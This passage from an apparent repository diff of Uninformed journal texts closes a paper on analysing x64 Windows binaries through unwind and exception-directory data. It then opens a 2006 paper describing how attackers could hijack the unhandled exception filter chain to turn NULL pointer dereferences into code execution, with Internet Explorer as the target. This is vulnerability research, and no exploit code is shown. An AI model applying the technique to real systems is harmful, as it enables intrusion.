return address. The key is to remember that the 0x20 bytes immediately
|
||||
adjacent to the return address are owned by the called function. One
|
||||
important side affect of this requirement is that if a function calls
|
||||
other functions, the calling function's minimum stack allocation will be
|
||||
0x20 bytes. This accounts for the register parameter area that will be
|
||||
used by called functions.
|
||||
|
||||
The obvious question to ask at this point is why it's the caller's
|
||||
responsibility to allocate stack space for use by the called function.
|
||||
There are a few different reasons for this. Perhaps most importantly,
|
||||
it makes it possible for the called function to take the address of a
|
||||
parameter that's passed via a register. Furthermore, the address that
|
||||
is returned for the parameter must be at a location that is contiguous
|
||||
in relation to the other parameters. This is particularly necessary for
|
||||
variadic functions, which require a contiguous list of parameters, but
|
||||
may also be necessary for applications that make assumptions about being
|
||||
able to reference parameters in relation to one another by address.
|
||||
Invalidating this assumption would introduce source compatibility
|
||||
problems.
|
||||
|
||||
For more information on parameter passing, refer to the MSDN
|
||||
documentation[4,7].
|
||||
|
||||
== Return Address
|
||||
|
||||
Due to the fact that pointers are 64 bits wide on x64, the return
|
||||
address location on the stack is eight bytes instead of four.
|
||||
|
||||
== Locals
|
||||
|
||||
The locals portion of a function's stack frame encompasses both local
|
||||
variables and saved non-volatile registers. For x64, the general
|
||||
purpose registers described as non-volatile are RBP, RBX, RDI, RSI, and
|
||||
R12 through R15[5].
|
||||
|
||||
|
||||
3.3) Exception Handling on x64
|
||||
|
||||
On x86, exception handling is accomplished through the adding and
|
||||
removing of exception registration records on a per-thread basis. When
|
||||
a function is entered that makes use of an exception handler, it
|
||||
constructs an exception registration record on the stack that is
|
||||
composed of an exception handler (a function pointer), and a pointer to
|
||||
the next element in the exception handler list. This list of exception
|
||||
registration records is stored relative to fs:[0]. When an exception
|
||||
occurs, the exception dispatcher walks the list of exception handlers
|
||||
and calls each one, checking to see if they are capable of handling the
|
||||
exception that occurred. While this approach works perfectly fine,
|
||||
Microsoft realized that there were better ways to go about it. First of
|
||||
all, the adding and removing of exception registration records that are
|
||||
static in the context of an execution path adds needless execution
|
||||
overhead. Secondly, the security implications of storing a function
|
||||
pointer on the stack have been made very obvious, especially in the case
|
||||
where that function pointer can be called after an exception is
|
||||
generated (such as an access violation). Finally, the process of
|
||||
unwinding call frames is muddled with limitations, thus making it a more
|
||||
complicated process than it might otherwise need to be[6].
|
||||
|
||||
With these things in mind, Microsoft completely revamped the way
|
||||
exception handling is accomplished on x64. The major changes center
|
||||
around the approaches Microsoft has taken to solve the three major
|
||||
deficiencies found on x86. First, Microsoft solved the execution time
|
||||
overhead issue of adding and removing exception handlers by moving all
|
||||
of the static exception handling information into a static location in
|
||||
the binary. This location, known as the .pdata section, is described by
|
||||
the PE32+'s Exception Directory. The structure of this section will be
|
||||
described in the exception directory subsection. By eliminating the
|
||||
need to add and remove exception handlers on the fly, Microsoft has also
|
||||
eliminated the security issue found on x86 with regard to overwriting
|
||||
the function pointer of an exception handler. Perhaps most importantly,
|
||||
the process involved in unwinding call frames has been drastically
|
||||
improved through the formalization of the frame unwinding process. This
|
||||
will be discussed in the subsection on unwind information.
|
||||
|
||||
|
||||
3.3.1) Exception Directory
|
||||
|
||||
The Exception Directory of a PE32+ binary is used to convey the complete
|
||||
list of functions that could be found in a stack frame during an unwind
|
||||
operation. These functions are known as non-leaf functions, and they
|
||||
are qualified as such if they either allocate space on the stack or call
|
||||
other functions. The IMAGE_RUNTIME_FUNCTION_ENTRY data structure is used
|
||||
to describe the non-leaf functions, as shown below[1]:
|
||||
|
||||
typedef struct _IMAGE_RUNTIME_FUNCTION_ENTRY {
|
||||
ULONG BeginAddress;
|
||||
ULONG EndAddress;
|
||||
ULONG UnwindInfoAddress;
|
||||
} _IMAGE_RUNTIME_FUNCTION_ENTRY, *_PIMAGE_RUNTIME_FUNCTION_ENTRY;
|
||||
|
||||
The BeginAddress and EndAddress attributes are RVAs that represent the
|
||||
range of the non-leaf function. The UnwindInfoAddress will be discussed
|
||||
in more detail in the following subsection on unwind information. The
|
||||
Exception directory itself is merely an array of
|
||||
IMAGE_RUNTIME_FUNCTION_ENTRY structures. When an exception occurs, the
|
||||
exception dispatcher will enumerate the array of runtime function
|
||||
entries until it finds the non-leaf function associated with the address
|
||||
it's searching for (typically a return address).
|
||||
|
||||
|
||||
3.3.2) Unwind Information
|
||||
|
||||
For the purpose of unwinding call frames and dispatching exceptions,
|
||||
each non-leaf function has some non-zero amount of unwind information
|
||||
associated with it. This association is made through the
|
||||
UnwindInfoAddress attribute of the IMAGE_RUNTIME_FUNCTION_ENTRY
|
||||
structure. The UnwindInfoAddress itself is an RVA that points to an
|
||||
UNWIND_INFO structure which is defined as[8]:
|
||||
|
||||
typedef struct _UNWIND_INFO {
|
||||
UBYTE Version : 3;
|
||||
UBYTE Flags : 5;
|
||||
UBYTE SizeOfProlog;
|
||||
UBYTE CountOfCodes;
|
||||
UBYTE FrameRegister : 4;
|
||||
UBYTE FrameOffset : 4;
|
||||
UNWIND_CODE UnwindCode[1];
|
||||
/* UNWIND_CODE MoreUnwindCode[((CountOfCodes + 1) & ~1) - 1];
|
||||
* union {
|
||||
* OPTIONAL ULONG ExceptionHandler;
|
||||
* OPTIONAL ULONG FunctionEntry;
|
||||
* };
|
||||
* OPTIONAL ULONG ExceptionData[]; */
|
||||
} UNWIND_INFO, *PUNWIND_INFO;
|
||||
|
||||
This structure, at a very high level, describes a non-leaf function in
|
||||
terms of its prologue size and frame register usage. Furthermore, it
|
||||
describes the way in which the stack is set up when the prologue for
|
||||
this non-leaf function is executed. This is provided through an array
|
||||
of codes as accessed through the UnwindCode array. This array is
|
||||
composed of UNWIND_CODE structures which are defined as[8]:
|
||||
|
||||
typedef union _UNWIND_CODE {
|
||||
struct {
|
||||
UBYTE CodeOffset;
|
||||
UBYTE UnwindOp : 4;
|
||||
UBYTE OpInfo : 4;
|
||||
};
|
||||
USHORT FrameOffset;
|
||||
} UNWIND_CODE, *PUNWIND_CODE;
|
||||
|
||||
In order to properly unwind a frame, the exception dispatcher needs to
|
||||
be aware of the amount of stack space allocated in that frame, the
|
||||
locations of saved non-volatile registers, and anything else that has to
|
||||
do with the stack. This information is necessary in order to be able to
|
||||
restore the caller's stack frame when an unwind operation occurs. By
|
||||
having the compiler keep track of this information at link time, it's
|
||||
possible to emulate the unwind process by inverting the operations
|
||||
described in the unwind code array for a given non-leaf function.
|
||||
|
||||
Aside from conveying stack frame set up, the UNWIND_INFO structure may
|
||||
also describe exception handling information, such as the exception
|
||||
handler that is to be called if an exception occurs. This information
|
||||
is conveyed through the ExceptionHandler and ExceptionData attributes of
|
||||
the structure which exist only if the UNW_FLAGE_HANDLER flag is set in the
|
||||
Flags field.
|
||||
|
||||
For more details on the format and use of these structures for unwinding
|
||||
as well as a complete description of the unwind process, please refer to
|
||||
the MSDN documentation[2].
|
||||
|
||||
|
||||
4) Analysis Techniques
|
||||
|
||||
In order to improve the analysis of x64 binaries, it is important to try
|
||||
to identify techniques that can aide in the identification or extraction
|
||||
of useful information from the binary in an automated fashion. This
|
||||
chapter will focus on a handful of simple techniques that can be used to
|
||||
better annotate or describe the behavior of an x64 binary. These
|
||||
techniques intentionally do not cover the analysis of code or data flow
|
||||
operations. Such techniques are outside of the scope of this paper.
|
||||
|
||||
|
||||
4.1) Exception Directory Enumeration
|
||||
|
||||
Given the explanation of the Exception Directory found within PE32+
|
||||
images and its application to the exception dispatching process, it can
|
||||
be seen that x64 binaries have a lot of useful meta-information stored
|
||||
within them. Given that this information is just sitting there waiting
|
||||
to be used, it makes sense to try to take advantage of it in ways that
|
||||
make it possible to better annotate or understand an x64 binary. The
|
||||
following subsections will describe different things that can be
|
||||
discovered by digging deeper into the contents of the exception
|
||||
directory.
|
||||
|
||||
|
||||
4.1.1) Functions
|
||||
|
||||
One of the most obvious uses for the information stored in the exception
|
||||
directory is that it can be used to discover all of the non-leaf
|
||||
functions in a binary. This is cool because it works regardless of
|
||||
whether or not you actually have symbols for the binary, thus providing
|
||||
an easy technique for identifying the majority of the functions in a
|
||||
binary. The process taken to do this is to simply enumerate the array
|
||||
of IMAGE_RUNTIME_FUNCTION_ENTRY structures stored within the exception
|
||||
directory. The BeginAddress attribute of each entry marks the starting
|
||||
point of a non-leaf function. There's a catch, though. Not all of the
|
||||
runtime function entries are actually associated with the entry point of
|
||||
a function. The fact of the matter is that entries can also be
|
||||
associated with various portions of an actual function where stack
|
||||
modifications are deferred until necessary. In these cases, the unwind
|
||||
information associated with the runtime function entry is chained with
|
||||
another runtime function entry.
|
||||
|
||||
The chaining of runtime function entries is documented as being
|
||||
indicated through the UNW_FLAG_CHAININFO flag in the Flags attribute of
|
||||
the UNWIND_INFO structure. If this flag is set, the area of memory
|
||||
immediately following the last UNWIND_CODE in the UNWIND_INFO structure
|
||||
is an IMAGE_RUNTIME_FUNCTION_ENTRY structure. The UnwindInfoAddress of
|
||||
this structure indicates the chained unwind information. Aside from
|
||||
this, chaining can also be indicated through an undocumented flag that
|
||||
is stored in the least-significant bit of the UnwindInfoAddress. If the
|
||||
least-significant bit is set, then it is implied that the runtime
|
||||
function entry is directly chained to the IMAGE_RUNTIME_FUNCTION_ENTRY
|
||||
structure that is found at the RVA conveyed by the UnwindInfoAddress
|
||||
attribute with the least significant bit masked off. The reason
|
||||
chaining can be indicated in this fashion is because it is a requirement
|
||||
that unwind information be four byte aligned.
|
||||
|
||||
With chaining in mind, it is safe to assume that a runtime function
|
||||
entry is associated with the entry point of a function if its unwind
|
||||
information is not chained. This makes it possible to deterministically
|
||||
identify the entry point of all of the non-leaf functions. From there,
|
||||
it should be possible to identify all of the leaf functions through
|
||||
calls that are made to them by non-leaf functions. This requires code
|
||||
flow analysis, though.
|
||||
|
||||
|
||||
4.1.2) Stack Frame Annotation
|
||||
|
||||
The unwind information associated with each non-leaf function
|
||||
contains lots of useful meta-information about the structure of the
|
||||
stack. It provides information about the amount of stack space
|
||||
allocated, the location of saved non-volatile registers, and whether or
|
||||
not a frame register is used and what relation it has to the rest of the
|
||||
stack. This information is also described in terms of the location of
|
||||
the instruction that actually performs the operation associated with the
|
||||
task. Take the following unwind information obtained through dumpbin
|
||||
/unwindinfo as an example:
|
||||
|
||||
|
||||
0000060C 00006E50 00006FF0 000081FC _resetstkoflw
|
||||
Unwind version: 1
|
||||
Unwind flags: None
|
||||
Size of prologue: 0x47
|
||||
Count of codes: 18
|
||||
Frame register: rbp
|
||||
Frame offset: 0x20
|
||||
Unwind codes:
|
||||
3C: SAVE_NONVOL, register=r15 offset=0x98
|
||||
38: SAVE_NONVOL, register=r14 offset=0xA0
|
||||
31: SAVE_NONVOL, register=r13 offset=0xA8
|
||||
2A: SAVE_NONVOL, register=r12 offset=0xD8
|
||||
23: SAVE_NONVOL, register=rdi offset=0xD0
|
||||
1C: SAVE_NONVOL, register=rsi offset=0xC8
|
||||
15: SAVE_NONVOL, register=rbx offset=0xC0
|
||||
0E: SET_FPREG, register=rbp, offset=0x20
|
||||
09: ALLOC_LARGE, size=0xB0
|
||||
02: PUSH_NONVOL, register=rbp
|
||||
|
||||
|
||||
First and foremost, one can immediately see that the size of the
|
||||
prologue used in the resetstkoflw function is 0x47 bytes. This prologue
|
||||
accounts for all of the operations described in the unwind codes array.
|
||||
Furthermore, one can also tell that the function uses a frame pointer,
|
||||
as conveyed through rbp, and that the frame pointer offset is 0x20 bytes
|
||||
relative to the current stack pointer at the time the frame pointer
|
||||
register is established.
|
||||
|
||||
As one would expect with an unwind operation, the unwind codes
|
||||
themselves are stored in the opposite order of which they are executed.
|
||||
This is necessary because of the effect on the stack each unwind code
|
||||
can have. If they are processed in the wrong order, then the unwind
|
||||
operation will get invalid data. For example, the value obtained
|
||||
through a pop rbp instruction will differ depending on whether or not it
|
||||
is done before or after an add rsp, 0xb0.
|
||||
|
||||
For the purposes of annotation, however, the important thing to keep in
|
||||
mind is how all of the useful information can be extracted. In this
|
||||
case, it is possible to take all of the information the unwind codes
|
||||
provide and break it down into a definition of the stack frame layout
|
||||
for a function. This can be accomplished by processing the unwind codes
|
||||
in the order that they would be executed rather than the order that they
|
||||
appear in the array. There's one important thing to keep in mind when
|
||||
doing this. Since unwind information can be chained, it is a
|
||||
requirement that the full chain of unwind codes be processed in
|
||||
execution order. This can be accomplished by walking the chain of
|
||||
unwind information and building an execution order list of all of the
|
||||
unwind codes.
|
||||
|
||||
Once the execution order list of unwind codes is collected, the next
|
||||
step is to simply enumerate each code, checking to see what operation it
|
||||
performs and building out the stack frame across each iteration. Prior
|
||||
to enumerating each code, the state of the stack pointer should be
|
||||
initialized to 0 to indicate an empty stack frame. As data is allocated
|
||||
on the stack, the stack pointer should be adjusted by the appropriate
|
||||
amount. The actions that need to be taken for each unwind operation
|
||||
that directly effect the stack pointer are described below.
|
||||
|
||||
1. UWOP_PUSH_NONVOL
|
||||
|
||||
When a non-volatile register is pushed onto the stack, such as
|
||||
through a push rbp, the current stack pointer needs to be
|
||||
decremented by 8 bytes.
|
||||
|
||||
2. UWOP_ALLOC_LARGE and UWOP_ALLOC_SMALL
|
||||
|
||||
When stack space is allocated, the current stack pointer needs to
|
||||
be adjusted by the amount indicated.
|
||||
|
||||
3. UWOP_SET_FPREG
|
||||
|
||||
When a frame pointer is defined, its offset relative to the base of
|
||||
the stack should be saved using the current value of the stack
|
||||
pointer.
|
||||
|
||||
|
||||
As the enumeration unwind codes occurs, it is also possible to annotate
|
||||
the different locations on the stack where non-volatile registers are
|
||||
preserved. For instance, given the example unwind information above, it
|
||||
is known that the R15 register is preserved at [rsp + 0x98]. Therefore,
|
||||
we can annotate this location as [rsp + SavedR15].
|
||||
|
||||
Beyond annotating preserved register locations on the stack, we can also
|
||||
annotate the instructions that perform operations that effect the stack.
|
||||
For instance, when a non-volatile register is pushed, such as through
|
||||
push rbp, we can annotate the instruction that performs that operation
|
||||
as preserving rbp on the stack. The location of the instruction that's
|
||||
associated with the operation can be determined by taking the
|
||||
BeginAddress associated with the unwind information and adding it to the
|
||||
CodeOffset attribute of the UNWIND_CODE that is being processed. It is
|
||||
important to note, however, that the CodeOffset attribute actually
|
||||
points to the first byte of the instruction immediately following the
|
||||
one that performs the actual operation, so it is necessary to back track
|
||||
in order to determine the start of the instruction that actually
|
||||
performs the operation.
|
||||
|
||||
As a result of this analysis, one can take the prologue of the
|
||||
resetstkoflw function and automatically convert it from:
|
||||
|
||||
.text:100006E50 push rbp
|
||||
.text:100006E52 sub rsp, 0B0h
|
||||
.text:100006E59 lea rbp, [rsp+0B0h+var_90]
|
||||
.text:100006E5E mov [rbp+0A0h], rbx
|
||||
.text:100006E65 mov [rbp+0A8h], rsi
|
||||
.text:100006E6C mov [rbp+0B0h], rdi
|
||||
.text:100006E73 mov [rbp+0B8h], r12
|
||||
.text:100006E7A mov [rbp+88h], r13
|
||||
.text:100006E81 mov [rbp+80h], r14
|
||||
.text:100006E88 mov [rbp+78h], r15
|
||||
|
||||
|
||||
to a version with better annotation:
|
||||
|
||||
|
||||
.text:100006E50 push rbp ; SavedRBP
|
||||
.text:100006E52 sub rsp, 0B0h
|
||||
.text:100006E59 lea rbp, [rsp+20h]
|
||||
.text:100006E5E mov [rbp+0A0h], rbx ; SavedRBX
|
||||
.text:100006E65 mov [rbp+98h+SavedRSI], rsi ; SavedRSI
|
||||
.text:100006E6C mov [rbp+98h+SavedRDI], rdi ; SavedRDI
|
||||
.text:100006E73 mov [rbp+98h+SavedR12], r12 ; SavedR12
|
||||
.text:100006E7A mov [rbp+98h+SavedR13], r13 ; SavedR13
|
||||
.text:100006E81 mov [rbp+98h+SavedR14], r14 ; SavedR14
|
||||
.text:100006E88 mov [rbp+98h+SavedR15], r15 ; SavedR15
|
||||
|
||||
|
||||
While such annotation may is not entirely useful to understanding
|
||||
the behavior of the binary, it at least simplifies the process of
|
||||
understanding the layout of the stack.
|
||||
|
||||
|
||||
4.1.3) Exception Handlers
|
||||
|
||||
The unwind information structure for a non-leaf function also contains
|
||||
useful information about the way in which exceptions within that
|
||||
function should be dispatched. If the unwind information associated
|
||||
with a function has the UNW_FLAG_EHANDLER or UNW_FLAG_UHANDLER flag set,
|
||||
then the function has an exception handler associated with it. The
|
||||
exception handler is conveyed through the ExceptionHandler attribute
|
||||
which comes immediately after the array of unwind codes. This handler is
|
||||
defined as being a language-specific handler for processing the
|
||||
exception. More specifically, the exception handler is specific to the
|
||||
semantics associated with a given programming language, such as C or
|
||||
C++[3]. For C, the language-specific exception handler is named
|
||||
__C_specific_handler.
|
||||
|
||||
Given that all C functions that handle exceptions will have the same
|
||||
exception handler, how does the function-specific code for handling an
|
||||
exception actually get called? For the case of C functions, the
|
||||
function-specific exception handler is stored in a scope table in the
|
||||
ExceptionData portion of the UNWIND_INFO structure. Other languages may
|
||||
have a different ExceptionData definition. This C scope table is defined
|
||||
by the structures shown below:
|
||||
|
||||
typedef struct _C_SCOPE_TABLE_ENTRY {
|
||||
ULONG Begin;
|
||||
ULONG End;
|
||||
ULONG Handler;
|
||||
ULONG Target;
|
||||
} C_SCOPE_TABLE_ENTRY, *PC_SCOPE_TABLE_ENTRY;
|
||||
|
||||
typedef struct _C_SCOPE_TABLE {
|
||||
ULONG NumEntries;
|
||||
C_SCOPE_TABLE_ENTRY Table[1];
|
||||
} C_SCOPE_TABLE, *PC_SCOPE_TABLE;
|
||||
|
||||
The scope table entries describe the function-specific exception
|
||||
handlers in relation to the specific areas of the function that they
|
||||
apply to. Each of the attributes of the C_SCOPE_TABLE_ENTRY is expressed
|
||||
as an RVA. The Target attribute defines the location to transfer
|
||||
control to after the exception is handled.
|
||||
|
||||
The reason why all of the exception handler information is useful is
|
||||
because it makes it possible to annotate a function in terms of what
|
||||
exception handlers may be called during its execution. It also makes it
|
||||
possible to identify the exception handler functions that may otherwise
|
||||
not be found due to the fact that they are executed indirectly. For
|
||||
example, the function CcAcquireByteRangeForWrite in ntoskrnl.exe can be
|
||||
annotated in the following fashion:
|
||||
|
||||
|
||||
.text:0000000000434520 ; Exception handler: __C_specific_handler
|
||||
.text:0000000000434520 ; Language specific handler: sub_4C7F30
|
||||
.text:0000000000434520
|
||||
.text:0000000000434520 CcAcquireByteRangeForWrite proc near
|
||||
|
||||
|
||||
4.2) Register Parameter Area Annotation
|
||||
|
||||
Given the requirement that the register parameter area be allocated on
|
||||
the stack in the context of a function that calls other functions, it is
|
||||
possible to statically annotate specific portions of the stack frame for
|
||||
a function as being the location of the caller's register parameter
|
||||
area. Furthermore, the location of a given function's register
|
||||
parameter area that is to be used by called functions can also be
|
||||
annotated.
|
||||
|
||||
The location of the register parameter area is always at a fixed
|
||||
location in a stack frame. Specifically, it immediately follows the
|
||||
return address on the stack. If annotations are added for CallerRCX at
|
||||
offset 0x8, CallerRDX at offset 0x10, CallerR8 at offset 0x18, and
|
||||
CallerR9 at offset 0x20, it is possible to get a better view of the
|
||||
stack frame for a given function. It also makes it easier to understand
|
||||
when and how this region of the stack is used by a function. For
|
||||
instance, the CcAcquireByteRangeForWrite function in ntoskrnl.exe makes
|
||||
use of this area to store the values of the first four parameters:
|
||||
|
||||
|
||||
.text:0000000000434520 mov [rsp+CallerR9], r9
|
||||
.text:0000000000434525 mov dword ptr [rsp+CallerR8], r8d
|
||||
.text:000000000043452A mov [rsp+CallerRDX], rdx
|
||||
.text:000000000043452F mov [rsp+CallerRCX], rcx
|
||||
|
||||
|
||||
5) Conclusion
|
||||
|
||||
This paper has presented a few basic approaches that can be used to
|
||||
extract useful information from an x64 binary for the purpose of
|
||||
analysis. By analyzing the unwind information associated with
|
||||
functions, it is possible to get a better understanding for how a
|
||||
function's stack frame is laid out. Furthermore, the unwind information
|
||||
makes it possible to describe the relationship between a function and
|
||||
its exception handler(s). Looking toward the future, x64 is likely to
|
||||
become the standard architecture given Microsoft's adoption of it as
|
||||
their primary architecture. With this in mind, coming up with
|
||||
techniques to better automate the binary analysis process will become
|
||||
more necessary.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
[1] Microsoft Corporation. ntimage.h.
|
||||
3790 DDK header files.
|
||||
|
||||
[2] Microsoft Corporation. Exception Handling (x64).
|
||||
http://msdn2.microsoft.com/en-us/library/1eyas8tf(VS.80).aspx;
|
||||
accessed Apr 25, 2006.
|
||||
|
||||
[3] Microsoft Corporation. The Language Specific Handler.
|
||||
http://msdn2.microsoft.com/en-us/library/b6sf5kbd(VS.80).aspx;
|
||||
accessed Apr 25, 2006.
|
||||
|
||||
[4] Microsoft Corporation. Parameter Passing.
|
||||
http://msdn2.microsoft.com/en-us/library/zthk2dkh.aspx;
|
||||
accessed Apr 25, 2006.
|
||||
|
||||
[5] Microsoft Corporation. Register Usage.
|
||||
http://msdn2.microsoft.com/en-us/library/9z1stfyw(VS.80).aspx;
|
||||
accessed Apr 25, 2006.
|
||||
|
||||
[6] Microsoft Corporation. SEH in x86 Environments.
|
||||
http://msdn2.microsoft.com/en-US/library/ms253960.aspx;
|
||||
accessed Apr 25, 2006.
|
||||
|
||||
[7] Microsoft Corporation. Stack Usage.
|
||||
http://msdn2.microsoft.com/en-us/library/ew5tede7.aspx;
|
||||
accessed Apr 25, 2006.
|
||||
|
||||
[8] Microsoft Corporation. Unwind Data Definitions in C.
|
||||
http://msdn2.microsoft.com/en-us/library/ssa62fwe(VS.80).aspx;
|
||||
accessed Apr 25, 2006.
|
711
uninformed/4.5.txt
Normal file
711
uninformed/4.5.txt
Normal file
|
@ -0,0 +1,711 @@
|
|||
Exploiting the Otherwise Unexploitable on Windows
|
||||
skywing, skape
|
||||
May 2006
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: This paper describes a technique that can be applied in
|
||||
certain situations to gain arbitrary code execution through software
|
||||
bugs that would not otherwise be exploitable, such as NULL pointer
|
||||
dereferences. To facilitate this, an attacker gains control of the
|
||||
top-level unhandled exception filter for a process in an indirect
|
||||
fashion. While there has been previous work [1, 3] illustrating the
|
||||
usefulness in gaining control of the top-level unhandled exception
|
||||
filter, Microsoft has taken steps in XPSP2 and beyond, such as function
|
||||
pointer encoding[4], to prevent attackers from being able to overwrite
|
||||
and control the unhandled exception filter directly. While this
|
||||
security enhancement is a marked improvement, it is still possible for
|
||||
an attacker to gain control of the top-level unhandled exception filter
|
||||
by taking advantage of a design flaw in the way unhandled exception
|
||||
filters are chained. This approach, however, is limited by an attacker's
|
||||
ability to control the chaining of unhandled exception filters, such as
|
||||
through the loading and unloading of DLLs. This does reduce the global
|
||||
impact of this approach; however, there are some interesting cases where
|
||||
it can be immediately applied, such as with Internet Explorer.
|
||||
|
||||
Disclaimer: This document was written in the interest of education. The
|
||||
authors cannot be held responsible for how the topics discussed in this
|
||||
document are applied.
|
||||
|
||||
Thanks: The authors would like to thank H D Moore, and everyone who
|
||||
learns because it's fun.
|
||||
|
||||
Update: This issue has now been addressed by the patch included in
|
||||
MS06-051. A complete analysis has not yet been performed to ensure that
|
||||
it patches all potential vectors.
|
||||
|
||||
With that, on with the show...
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
In the security field, software bugs can be generically grouped into two
|
||||
categories: exploitable or non-exploitable. If a software bug is
|
||||
exploitable, then it can be leveraged to the advantage of the attacker,
|
||||
such as to gain arbitrary code execution. However, if a software bug is
|
||||
non-exploitable, then it is not possible for the attacker to make use of
|
||||
it for anything other than perhaps crashing the application. In more
|
||||
cases than not, software bugs will fall into the category of being
|
||||
non-exploitable simply because they typically deal with common mistakes
|
||||
or invalid assumptions that are not directly related to buffer
|
||||
management or loop constraints. This can be frustrating during auditing
|
||||
and product analysis from an assessment standpoint. With that in mind,
|
||||
it only makes sense to try think of ways to turn otherwise
|
||||
non-exploitable issues into exploitable issues.
|
||||
|
||||
In order to accomplish this feat, it's first necessary to try to
|
||||
consider execution vectors that could be redirected to code that the
|
||||
attacker controls after triggering a non-exploitable bug, such as a NULL
|
||||
pointer dereference. For starters, it is known that the triggering of a
|
||||
NULL pointer dereference will cause an access violation exception to be
|
||||
dispatched. When this occurs, the user-mode exception dispatcher will
|
||||
call the registered exception handlers for the thread that generated the
|
||||
exception, allowing each the opportunity to handle the exception. If
|
||||
none of the exception handlers know what to do with it, the user-mode
|
||||
exception dispatcher will call the top-level unhandled exception filter
|
||||
(UEF) via kernel32!UnhandledExceptionFilter (if one has been set). The
|
||||
implementation of a function that is set as the registered top-level UEF
|
||||
is not specified, but in most cases it will be designed to pass
|
||||
exceptions that it cannot handle onto the top-level UEF that was
|
||||
registered previously, effectively creating a chain of UEFs. This
|
||||
process will be explained in more detail in the next chapter.
|
||||
|
||||
Aside from the exception dispatching process, there are not any other
|
||||
controllable execution vectors that an attacker might be able to
|
||||
redirect without some other situation-specific conditions. For that
|
||||
reason, the most important place to look for a point of redirection is
|
||||
within the exception dispatching process itself. This will provide a
|
||||
generic means of gaining execution control for any bug that can be made
|
||||
to crash an application.
|
||||
|
||||
Since the first part of the exception dispatching process is the calling
|
||||
of registered exception handlers for the thread, it may make sense to
|
||||
see if there are any controllable execution paths taken by the
|
||||
registered exception handlers at the time that the exception is
|
||||
triggered. This may work in some cases, but is not universal and
|
||||
requires analysis of the specific exception handler routines. Without
|
||||
having an ability to corrupt the list of exception handlers, there is
|
||||
likely to be no other method of redirecting this phase of the exception
|
||||
dispatching process.
|
||||
|
||||
If none of the registered exception handlers can be redirected, one must
|
||||
look toward a method that can be used to redirect the unhandled
|
||||
exception filter. This could be accomplished by changing the function
|
||||
pointer to call into controlled code as illustrated in[1,3]. However,
|
||||
Microsoft has taken steps in XPSP2, such as encoding the function
|
||||
pointer that represents the top-level UEF[4]. This no longer makes it
|
||||
feasible to directly overwrite the global variable that contains the
|
||||
top-level UEF. With that in mind, it may also make sense to look at the
|
||||
function associated with top-level UEF at the time that the exception is
|
||||
dispatched in order to see if the function itself has any meaningful way
|
||||
to redirect its execution.
|
||||
|
||||
From this initial analysis, one is left with being required to perform
|
||||
an application-dependent analysis of the registered exception handlers
|
||||
and UEFs that exist at the time that the exception is dispatched. Though
|
||||
this may be useful in some situations, they are likely to be few and far
|
||||
between. For that reason, it makes sense to try to dive one layer
|
||||
deeper to learn more about the exception dispatching process. Chapter
|
||||
will describe in more detail how unhandled exception filters work,
|
||||
setting the stage for the focus of this paper. Based on that
|
||||
understanding, chapter will expound upon an approach that can be used
|
||||
to gain indirect control of the top-level UEF. Finally, chapter will
|
||||
formalize the results of this analysis in an example of a working
|
||||
exploit that takes advantage of one of the many NULL pointer
|
||||
dereferences in Internet Explorer to gain arbitrary code execution.
|
||||
|
||||
|
||||
3) Understanding Unhandled Exception Filters
|
||||
|
||||
This chapter provides an introductory background into the way unhandled
|
||||
exception filters are registered and how the process of filtering an
|
||||
exception that is not handled actually works. This information is
|
||||
intended to act as a base for understanding the attack vector described
|
||||
in chapter . If the reader already has sufficient understanding of the
|
||||
way unhandled exception filters operate, feel free to skip ahead.
|
||||
|
||||
|
||||
3.1) Setting the Top-Level UEF
|
||||
|
||||
In order to make it possible for applications to handle all exceptions
|
||||
on a process-wide basis, the exception dispatcher exposes an interface
|
||||
for registering an unhandled exception filter. The purpose of the
|
||||
unhandled exception filter is entirely application specific. It can be
|
||||
used to log extra information about an unhandled exception, perform some
|
||||
advanced error recovery, handle language-specific exceptions, or any
|
||||
sort of other task that may need to be taken when an exception occurs
|
||||
that is not handled. To specify a function that should be used as the
|
||||
top-level unhandled exception filter for the process, a call must be
|
||||
made to kernel32!SetUnhandledExceptionFilter which is prototyped as[6]:
|
||||
|
||||
|
||||
LPTOP_LEVEL_EXCEPTION_FILTER SetUnhandledExceptionFilter(
|
||||
LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter
|
||||
);
|
||||
|
||||
When called, this function will take the function pointer passed in as
|
||||
the lpTopLevelExceptionFilter argument and encode it using
|
||||
kernel32!RtlEncodePointer. The result of the encoding will be stored in
|
||||
the global variable kernel32!BasepCurrentTopLevelFilter, thus
|
||||
superseding any previously established top-level filter. The previous
|
||||
value stored within this global variable is decoded using
|
||||
kernel32!RtlDecodePointer and returned to the caller. Again, the
|
||||
encoding and decoding of this function pointer is intended to prevent
|
||||
attackers from being able to use an arbitrary memory overwrite to
|
||||
redirect it as has been done pre-XPSP2.
|
||||
|
||||
There are two reasons that kernel32!SetUnhandledExceptionFilter returns
|
||||
a pointer to the original top-level UEF. First, it makes it possible to
|
||||
restore the original top-level UEF at some point in the future. Second,
|
||||
it makes it possible to create an implicit ``chain'' of UEFs. In this
|
||||
design, each UEF can make a call down to the previously registered
|
||||
top-level UEF by doing something like the pseudo code below:
|
||||
|
||||
|
||||
... app specific handling ...
|
||||
|
||||
if (!IsBadCodePtr(PreviousTopLevelUEF))
|
||||
return PreviousTopLevelUEF(ExceptionInfo);
|
||||
else
|
||||
return EXCEPTION_CONTINUE_SEARCH;
|
||||
|
||||
When a block of code that has registered a top-level UEF wishes to
|
||||
deregister itself, it does so by setting the top-level UEF to the value
|
||||
that was returned from its call to kernel32!SetUnhandledExceptionFilter.
|
||||
The reason it does it this way is because there is no true list of
|
||||
unhandled exception filters that is maintained. This method of
|
||||
deregistering has one very important property that will serve as the
|
||||
crux of this document. Since deregistration happens in this fashion,
|
||||
the register and deregister operations associated with a top-level UEF
|
||||
must occur in symmetric order.
|
||||
|
||||
In one example, the top-level UEF Fx is registered, returning Nx as the
|
||||
previous top-level UEF. Following that, Gx is registered, returning Fx
|
||||
as the previous value. After some period of time, Gx is deregistered by
|
||||
setting Fx as the top-level UEF, thus returning the top-level UEF to the
|
||||
value it contained before Gx was registered. Finally, Fx deregisters by
|
||||
setting Nx as the top-level UEF.
|
||||
|
||||
|
||||
3.2) Handling Unhandled Exceptions
|
||||
|
||||
When an exception goes through the initial phase of the exception
|
||||
dispatching process and is not handled by any of the registered
|
||||
exception handlers for the thread that the exception occurred in, the
|
||||
